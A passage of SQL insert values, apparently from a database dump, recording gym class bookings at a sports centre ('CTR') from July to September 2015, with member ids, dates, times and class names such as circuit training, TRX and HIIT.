(4282, 80, 'CTR', '2015-07-15', '17h30', '18h', 'Circuit training'),
(4283, 177, 'CTR', '2015-07-15', '18h15', '18h45', 'Force'),
(4284, 14, 'CTR', '2015-07-15', '18h15', '18h45', 'Force'),
(4285, 128, 'CTR', '2015-07-15', '18h15', '18h45', 'Force'),
(4286, 119, 'CTR', '2015-07-15', '18h15', '18h45', 'Force'),
(4287, 104, 'CTR', '2015-07-15', '18h15', '18h45', 'Force'),
(4288, 53, 'CTR', '2015-07-15', '18h15', '18h45', 'Force'),
(4289, 132, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4302, 48, 'CTR', '2015-07-13', '18h15', '18h45', 'Circuit training'),
(4291, 178, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4292, 165, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4293, 26, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4294, 155, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4295, 80, 'CTR', '2015-07-09', '18h30', '19h30', 'Cross Training OUTDOOR (ravel saint-servais)'),
(4296, 31, 'CTR', '2015-07-13', '18h15', '18h45', 'Circuit training'),
(4297, 31, 'CTR', '2015-07-13', '19h00', '19h30', 'Circuit training'),
(4334, 100, 'CTR', '2015-07-29', '19h ', '19h30', 'Circuit training'),
(4300, 32, 'CTR', '2015-07-09', '18h30', '19h30', 'Cross Training OUTDOOR (ravel saint-servais)'),
(4303, 48, 'CTR', '2015-07-13', '19h00', '19h30', 'Circuit training'),
(4309, 57, 'CTR', '2015-07-13', '18h15', '18h45', 'Circuit training'),
(4317, 164, 'CTR', '2015-07-15', '19h ', '19h30', 'Circuit training'),
(4310, 175, 'CTR', '2015-07-13', '18h15', '18h45', 'Circuit training'),
(4308, 126, 'CTR', '2015-07-13', '18h15', '18h45', 'Circuit training'),
(4312, 173, 'CTR', '2015-07-15', '19h45', '20h15', 'Circuit training'),
(4313, 80, 'CTR', '2015-07-15', '19h45', '20h15', 'Circuit training'),
(4314, 106, 'CTR', '2015-07-15', '17h30', '18h', 'Circuit training'),
(4315, 106, 'CTR', '2015-07-22', '19h ', '19h30', 'Circuit training'),
(4323, 140, 'CTR', '2015-07-22', '17h30', '18h', 'Circuit training'),
(4328, 80, 'CTR', '2015-07-22', '17h30', '18h', 'Circuit training'),
(4319, 57, 'CTR', '2015-07-15', '17h30', '18h', 'Circuit training'),
(4320, 14, 'CTR', '2015-07-22', '18h15', '18h45', 'Force'),
(4322, 132, 'CTR', '2015-07-27', '19h00', '19h30', 'Circuit training'),
(4335, 48, 'CTR', '2015-07-27', '17h30', '18h00', 'Circuit training'),
(4336, 48, 'CTR', '2015-07-29', '19h ', '19h30', 'Circuit training'),
(4326, 165, 'CTR', '2015-07-22', '19h ', '19h30', 'Circuit training'),
(4327, 44, 'CTR', '2015-07-22', '19h ', '19h30', 'Circuit training'),
(4329, 139, 'CTR', '2015-07-22', '17h30', '18h', 'Circuit training'),
(4330, 47, 'CTR', '2015-07-22', '17h30', '18h', 'Circuit training'),
(4331, 4, 'CTR', '2015-07-22', '17h30', '18h', 'Circuit training'),
(4332, 29, 'CTR', '2015-07-22', '17h30', '18h', 'Circuit training'),
(4333, 173, 'CTR', '2015-07-22', '17h30', '18h', 'Circuit training'),
(4338, 177, 'CTR', '2015-07-27', '17h30', '18h00', 'Circuit training'),
(4339, 177, 'CTR', '2015-07-29', '18h15', '18h45', 'Force'),
(4340, 139, 'CTR', '2015-07-27', '17h30', '18h00', 'Circuit training'),
(4341, 44, 'CTR', '2015-07-29', '19h ', '19h30', 'Circuit training'),
(4342, 101, 'CTR', '2015-07-29', '19h ', '19h30', 'Circuit training'),
(4343, 164, 'CTR', '2015-07-29', '19h ', '19h30', 'Circuit training'),
(4344, 165, 'CTR', '2015-07-29', '19h ', '19h30', 'Circuit training'),
(4345, 29, 'CTR', '2015-07-29', '17h30', '18h', 'Circuit training'),
(4346, 140, 'CTR', '2015-07-29', '17h30', '18h', 'Circuit training'),
(4347, 14, 'CTR', '2015-07-29', '19h ', '19h30', 'Circuit training'),
(4349, 44, 'CTR', '2015-08-03', '18h15', '18h45', 'Circuit training'),
(4350, 44, 'CTR', '2015-08-05', '19h ', '19h30', 'Circuit training'),
(4351, 44, 'CTR', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais'),
(4352, 31, 'CTR', '2015-08-03', '18h15', '18h45', 'Circuit training'),
(4353, 31, 'CTR', '2015-08-03', '19h00', '19h30', 'Circuit training'),
(4354, 100, 'CTR', '2015-08-05', '19h ', '19h30', 'Circuit training'),
(4363, 132, 'CTR', '2015-08-03', '19h00', '19h30', 'Circuit training'),
(4364, 165, 'CTR', '2015-08-05', '19h ', '19h30', 'Circuit training'),
(4357, 119, 'CTR', '2015-08-05', '19h ', '19h30', 'Circuit training'),
(4385, 48, 'CTR', '2015-08-10', '18h15', '18h45', 'Circuit training'),
(4359, 164, 'CTR', '2015-08-05', '19h ', '19h30', 'Circuit training'),
(4377, 29, 'CTR', '2015-08-05', '17h30', '18h', 'Circuit training'),
(4362, 92, 'CTR', '2015-08-03', '18h15', '18h45', 'Circuit training'),
(4365, 29, 'CTR', '2015-08-03', '17h30', '18h00', 'Circuit training'),
(4366, 145, 'CTR', '2015-08-03', '18h15', '18h45', 'Circuit training'),
(4367, 145, 'CTR', '2015-08-03', '18h15', '18h45', 'Circuit training'),
(4368, 145, 'CTR', '2015-08-03', '18h15', '18h45', 'Circuit training'),
(4369, 145, 'CTR', '2015-08-03', '18h15', '18h45', 'Circuit training'),
(4370, 32, 'CTR', '2015-08-03', '19h00', '19h30', 'Circuit training'),
(4371, 32, 'CTR', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais'),
(4372, 80, 'CTR', '2015-08-03', '19h00', '19h30', 'Circuit training'),
(4376, 138, 'CTR', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais'),
(4374, 92, 'CTR', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais'),
(4375, 80, 'CTR', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais'),
(4378, 48, 'CTR', '2015-08-05', '19h ', '19h30', 'Circuit training'),
(4379, 31, 'CTR', '2015-08-10', '18h15', '18h45', 'Circuit training'),
(4380, 31, 'CTR', '2015-08-10', '19h00', '19h30', 'Circuit training'),
(4381, 102, 'CTR', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais'),
(4382, 48, 'CTR', '2015-08-06', '18h30', '19h30', 'Cross training outdoor saint-servais'),
(4383, 138, 'CTR', '2015-08-10', '19h00', '19h30', 'Circuit training'),
(4384, 29, 'CTR', '2015-08-10', '17h30', '18h00', 'Circuit training'),
(4386, 48, 'CTR', '2015-08-10', '19h00', '19h30', 'Circuit training'),
(4387, 92, 'CTR', '2015-08-10', '19h00', '19h30', 'Circuit training'),
(4388, 102, 'CTR', '2015-08-10', '19h00', '19h30', 'Circuit training'),
(4389, 102, 'CTR', '2015-08-10', '19h00', '19h30', 'Circuit training'),
(4390, 132, 'CTR', '2015-08-12', '19h ', '19h30', 'Circuit training'),
(4392, 164, 'CTR', '2015-08-12', '19h ', '19h30', 'Circuit training'),
(4393, 165, 'CTR', '2015-08-12', '19h ', '19h30', 'Circuit training'),
(4394, 48, 'CTR', '2015-08-12', '19h ', '19h30', 'Circuit training'),
(4395, 30, 'CTR', '2015-08-12', '19h ', '19h30', 'Circuit training'),
(4396, 138, 'CTR', '2015-08-17', '19h00', '19h30', 'Circuit training'),
(4397, 48, 'CTR', '2015-08-17', '18h15', '18h45', 'Circuit training'),
(4398, 48, 'CTR', '2015-08-17', '19h00', '19h30', 'Circuit training'),
(4399, 100, 'CTR', '2015-08-17', '19h00', '19h30', 'Circuit training'),
(4400, 44, 'CTR', '2015-08-17', '18h15', '18h45', 'Circuit training'),
(4401, 44, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4402, 29, 'CTR', '2015-08-17', '17h30', '18h00', 'Circuit training'),
(4403, 29, 'CTR', '2015-08-19', '17h30', '18h', 'Circuit training'),
(4404, 26, 'CTR', '2015-08-17', '18h15', '18h45', 'Circuit training'),
(4405, 31, 'CTR', '2015-08-17', '18h15', '18h45', 'Circuit training'),
(4406, 31, 'CTR', '2015-08-17', '19h00', '19h30', 'Circuit training'),
(4407, 132, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4408, 92, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4409, 48, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4410, 171, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4411, 165, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4412, 164, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4413, 3, 'CTR', '2015-08-19', '17h30', '18h', 'Circuit training'),
(4414, 173, 'CTR', '2015-08-19', '19h ', '19h30', 'Circuit training'),
(4415, 139, 'CTR', '2015-08-19', '17h30', '18h', 'Circuit training'),
(4416, 140, 'CTR', '2015-08-19', '17h30', '18h', 'Circuit training'),
(4417, 165, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4418, 164, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4419, 92, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4420, 44, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4421, 48, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4422, 173, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4423, 132, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4424, 29, 'CTR', '2015-08-26', '17h30', '18h', 'Circuit training'),
(4446, 145, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4426, 3, 'CTR', '2015-08-26', '17h30', '18h', 'Circuit training'),
(4427, 29, 'CTR', '2015-08-24', '17h30', '18h00', 'Circuit training'),
(4428, 44, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4432, 92, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4431, 138, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4433, 48, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4434, 48, 'CTR', '2015-08-24', '19h00', '19h30', 'Circuit training'),
(4435, 100, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4436, 100, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4437, 145, 'CTR', '2015-08-24', '19h00', '19h30', 'Circuit training'),
(4438, 145, 'CTR', '2015-08-24', '19h00', '19h30', 'Circuit training'),
(4439, 145, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4440, 145, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4441, 100, 'CTR', '2015-08-24', '19h00', '19h30', 'Circuit training'),
(4442, 31, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4443, 31, 'CTR', '2015-08-24', '19h00', '19h30', 'Circuit training'),
(4444, 105, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4445, 80, 'CTR', '2015-08-24', '18h15', '18h45', 'Circuit training'),
(4447, 145, 'CTR', '2015-08-26', '19h ', '19h30', 'Circuit training'),
(4448, 30, 'CTR', '2015-08-26', '17h30', '18h', 'Circuit training'),
(4474, 181, 'CTR', '2015-09-02', '20h30', '21h', 'Circuit Training'),
(4450, 92, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4452, 44, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4453, 41, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4454, 180, 'CTR', '2015-09-02', '20h30', '21h', 'Circuit Training'),
(4455, 165, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4456, 164, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4457, 173, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4458, 132, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4459, 48, 'CTR', '2015-09-02', '19h ', '19h30', 'Circuit training'),
(4460, 48, 'CTR', '2015-08-31', '18h15', '18h45', 'Circuit training '),
(4461, 48, 'CTR', '2015-08-31', '19h', '19h30', 'Circuit training'),
(4462, 138, 'CTR', '2015-08-31', '19h', '19h30', 'Circuit training'),
(4463, 31, 'CTR', '2015-08-31', '18h15', '18h45', 'Circuit training '),
(4464, 31, 'CTR', '2015-08-31', '19h', '19h30', 'Circuit training'),
(4465, 134, 'CTR', '2015-08-31', '18h15', '18h45', 'Circuit training '),
(4466, 175, 'CTR', '2015-09-02', '20h30', '21h', 'Circuit Training'),
(4467, 80, 'CTR', '2015-09-02', '20h30', '21h', 'Circuit Training'),
(4468, 92, 'CTR', '2015-08-31', '19h', '19h30', 'Circuit training'),
(4469, 179, 'CTR', '2015-09-02', '20h30', '21h', 'Circuit Training'),
(4470, 179, 'CTR', '2015-09-09', '19h ', '19h30', 'Circuit training'),
(4607, 179, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4472, 179, 'CTR', '2015-08-31', '19h', '19h30', 'Circuit training'),
(4475, 182, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4476, 184, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4477, 183, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4478, 32, 'CTR', '2015-08-31', '19h', '19h30', 'Circuit training'),
(4479, 105, 'CTR', '2015-08-31', '18h15', '18h45', 'Circuit training '),
(4480, 44, 'CTR', '2015-09-01', '18h15', '18h45', 'Circuit Training'),
(4481, 181, 'CTR', '2015-09-09', '19h ', '19h30', 'Circuit training'),
(4559, 181, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4483, 177, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4562, 134, 'CTR', '2015-09-08', '18h15', '18h45', 'Circuit Training'),
(4485, 14, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4486, 168, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4487, 176, 'CTR', '2015-09-01', '18h15', '18h45', 'Circuit Training'),
(4488, 147, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4489, 73, 'CTR', '2015-09-02', '18h15', '18h45', 'Réservé sportifs'),
(4490, 138, 'CTR', '2015-09-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4491, 138, 'CTR', '2015-09-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4492, 140, 'CTR', '2015-09-02', '17h30', '18h', 'Circuit training'),
(4493, 30, 'CTR', '2015-09-02', '20h30', '21h', 'Circuit Training'),
(4494, 4, 'CTR', '2015-09-02', '17h30', '18h', 'Circuit training'),
(4495, 139, 'CTR', '2015-09-02', '17h30', '18h', 'Circuit training'),
(4496, 4, 'CTR', '2015-09-03', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4497, 97, 'CTR', '2015-09-03', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4572, 132, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4530, 44, 'CTR', '2015-09-07', '17h30', '18h00', 'Circuit training'),
(4500, 168, 'CTR', '2015-09-07', '17h30', '18h00', 'Circuit training'),
(4501, 177, 'CTR', '2015-09-09', '18h15', '18h45', 'Réservé sportifs'),
(4570, 100, 'CTR', '2015-09-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4568, 80, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4567, 14, 'CTR', '2015-09-09', '19h ', '19h30', 'Circuit training'),
(4507, 147, 'CTR', '2015-09-09', '18h15', '18h45', 'Réservé sportifs'),
(4508, 41, 'CTR', '2015-09-09', '19h ', '19h30', 'Circuit training'),
(4566, 31, 'CTR', '2015-09-15', '18h15', '18h45', 'Circuit Training'),
(4510, 168, 'CTR', '2015-09-09', '19h ', '19h30', 'Circuit training'),
(4511, 164, 'CTR', '2015-09-09', '19h ', '19h30', 'Circuit training'),
(4565, 29, 'CTR', '2015-09-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4513, 30, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4514, 180, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4516, 73, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4517, 92, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4518, 173, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4519, 175, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4520, 175, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4522, 32, 'CTR', '2015-09-03', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4528, 48, 'CTR', '2015-09-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4524, 41, 'CTR', '2015-09-03', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4525, 185, 'CTR', '2015-09-03', '18h15', '18h45', 'Circuit Training'),
(4529, 48, 'CTR', '2015-09-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4531, 32, 'CTR', '2015-09-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4532, 73, 'CTR', '2015-09-07', '17h30', '18h00', 'Circuit training'),
(4533, 30, 'CTR', '2015-09-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4534, 140, 'CTR', '2015-09-07', '17h30', '18h00', 'Circuit training'),
(4535, 103, 'CTR', '2015-09-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4536, 103, 'CTR', '2015-09-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4545, 30, 'CTR', '2015-09-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4538, 48, 'CTR', '2015-09-08', '18h15', '18h45', 'Circuit Training'),
(4539, 41, 'CTR', '2015-09-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4541, 41, 'CTR', '2015-09-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4542, 143, 'CTR', '2015-09-07', '17h30', '18h00', 'Circuit training'),
(4543, 37, 'CTR', '2015-09-07', '17h30', '18h00', 'Circuit training'),
(4544, 41, 'CTR', '2015-09-07', '17h30', '18h00', 'Circuit training'),
(4546, 32, 'CTR', '2015-09-07', '19h15', '19h45', 'Réservé Squash'),
(4547, 185, 'CTR', '2015-09-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4548, 185, 'CTR', '2015-09-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4624, 29, 'CTR', '2015-09-15', '18h15', '18h45', 'Circuit Training'),
(4625, 104, 'CTR', '2015-09-16', '18h15', '18h45', 'Réservé sportifs'),
(4626, 4, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4552, 41, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4553, 41, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4554, 41, 'CTR', '2015-09-17', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4569, 100, 'CTR', '2015-09-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4688, 80, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4557, 31, 'CTR', '2015-09-08', '18h15', '18h45', 'Circuit Training'),
(4558, 44, 'CTR', '2015-09-08', '18h15', '18h45', 'Circuit Training'),
(4560, 93, 'CTR', '2015-09-08', '18h15', '18h45', 'Circuit Training'),
(4561, 60, 'CTR', '2015-09-09', '20h30', '21h', 'Circuit Training'),
(4563, 29, 'CTR', '2015-09-08', '18h15', '18h45', 'Circuit Training'),
(4564, 185, 'CTR', '2015-09-08', '18h15', '18h45', 'Circuit Training'),
(4571, 155, 'CTR', '2015-09-09', '18h15', '18h45', 'Réservé sportifs'),
(4573, 30, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4574, 93, 'CTR', '2015-09-10', '18h15', '18h45', 'Circuit Training'),
(4575, 4, 'CTR', '2015-09-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4576, 4, 'CTR', '2015-09-10', '18h15', '18h45', 'Circuit Training'),
(4577, 26, 'CTR', '2015-09-10', '18h15', '18h45', 'Circuit Training'),
(4578, 32, 'CTR', '2015-09-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4579, 185, 'CTR', '2015-09-10', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4583, 173, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4581, 48, 'CTR', '2015-09-11', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4584, 73, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4585, 60, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4586, 175, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4587, 175, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4588, 180, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4589, 168, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4590, 14, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4591, 92, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4592, 164, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4593, 147, 'CTR', '2015-09-16', '18h15', '18h45', 'Réservé sportifs'),
(4594, 177, 'CTR', '2015-09-16', '18h15', '18h45', 'Réservé sportifs'),
(4595, 155, 'CTR', '2015-09-16', '18h15', '18h45', 'Réservé sportifs'),
(4657, 30, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4658, 63, 'CTR', '2015-09-18', '17h30', '18h', 'TRX'),
(4715, 181, 'CTR', '2015-09-30', '20h30', '21h', 'Circuit Training'),
(4645, 181, 'CTR', '2015-09-24', '18h15', '18h45', 'Circuit Training'),
(4600, 48, 'CTR', '2015-09-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4601, 48, 'CTR', '2015-09-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4602, 48, 'CTR', '2015-09-15', '18h15', '18h45', 'Circuit Training'),
(4603, 134, 'CTR', '2015-09-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4604, 134, 'CTR', '2015-09-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4605, 92, 'CTR', '2015-09-14', '19h45', '20h30', 'BodyBoxe'),
(4606, 138, 'CTR', '2015-09-14', '19h45', '20h30', 'BodyBoxe'),
(4608, 54, 'CTR', '2015-09-14', '17h30', '18h00', 'Circuit training'),
(4609, 100, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4610, 102, 'CTR', '2015-09-14', '19h45', '20h30', 'BodyBoxe'),
(4611, 143, 'CTR', '2015-09-14', '17h30', '18h00', 'Circuit training'),
(4612, 32, 'CTR', '2015-09-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4613, 32, 'CTR', '2015-09-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4614, 32, 'CTR', '2015-09-14', '19h45', '20h30', 'BodyBoxe'),
(4615, 56, 'CTR', '2015-09-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4616, 14, 'CTR', '2015-09-14', '17h30', '18h00', 'Circuit training'),
(4617, 56, 'CTR', '2015-09-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4618, 56, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4619, 44, 'CTR', '2015-09-14', '17h30', '18h00', 'Circuit training'),
(4620, 44, 'CTR', '2015-09-15', '18h15', '18h45', 'Circuit Training'),
(4621, 93, 'CTR', '2015-09-15', '18h15', '18h45', 'Circuit Training'),
(4622, 100, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4627, 139, 'CTR', '2015-09-16', '17h30', '18h', 'Circuit training'),
(4628, 188, 'CTR', '2015-09-16', '20h30', '21h', 'Circuit Training'),
(4629, 42, 'CTR', '2015-09-17', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4630, 187, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4636, 138, 'CTR', '2015-09-17', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4632, 63, 'CTR', '2015-09-16', '17h30', '18h', 'Circuit training'),
(4633, 140, 'CTR', '2015-09-16', '17h30', '18h', 'Circuit training'),
(4634, 103, 'CTR', '2015-09-16', '19h ', '19h30', 'Circuit training'),
(4635, 44, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4637, 100, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4644, 26, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4639, 185, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4640, 132, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4641, 47, 'CTR', '2015-09-18', '17h30', '18h', 'TRX'),
(4642, 31, 'CTR', '2015-09-22', '18h15', '18h45', 'Circuit Training'),
(4643, 143, 'CTR', '2015-09-17', '18h15', '18h45', 'Circuit Training'),
(4659, 30, 'CTR', '2015-09-18', '17h30', '18h', 'TRX'),
(4677, 100, 'CTR', '2015-09-24', '18h15', '18h45', 'Circuit Training'),
(4678, 187, 'CTR', '2015-09-24', '18h15', '18h45', 'Circuit Training'),
(4652, 182, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4687, 31, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4682, 139, 'CTR', '2015-09-23', '17h30', '18h', 'Circuit training'),
(4655, 179, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4656, 183, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4668, 175, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4663, 100, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
(4664, 48, 'CTR', '2015-09-22', '18h15', '18h45', 'Circuit Training'),
(4665, 56, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4667, 28, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4669, 175, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4670, 168, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4671, 180, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4672, 60, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4673, 173, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4674, 188, 'CTR', '2015-09-23', '20h30', '21h', 'Circuit Training'),
(4675, 44, 'CTR', '2015-09-22', '18h15', '18h45', 'Circuit Training'),
(4676, 44, 'CTR', '2015-09-24', '18h15', '18h45', 'Circuit Training'),
(4679, 100, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4680, 187, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4681, 187, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
(4683, 63, 'CTR', '2015-09-23', '17h30', '18h', 'Circuit training'),
(4684, 154, 'CTR', '2015-09-23', '17h30', '18h', 'Circuit training'),
(4685, 92, 'CTR', '2015-09-23', '19h ', '19h30', 'Circuit training'),
(4686, 4, 'CTR', '2015-09-23', '17h30', '18h', 'Circuit training'),
(4689, 185, 'CTR', '2015-09-24', '18h15', '18h45', 'Circuit Training'),
(4690, 29, 'CTR', '2015-09-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4691, 105, 'CTR', '2015-09-24', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4692, 32, 'CTR', '2015-09-24', '18h15', '18h45', 'Circuit Training'),
(4694, 47, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4695, 63, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4696, 139, 'CTR', '2015-09-30', '17h30', '18h', 'Circuit training'),
(4730, 31, 'CTR', '2015-10-06', '18h15', '18h45', 'Circuit Training'),
(4729, 4, 'CTR', '2015-09-30', '17h30', '18h', 'Circuit training'),
(4699, 132, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
(4700, 168, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
(4701, 164, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
(4702, 92, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
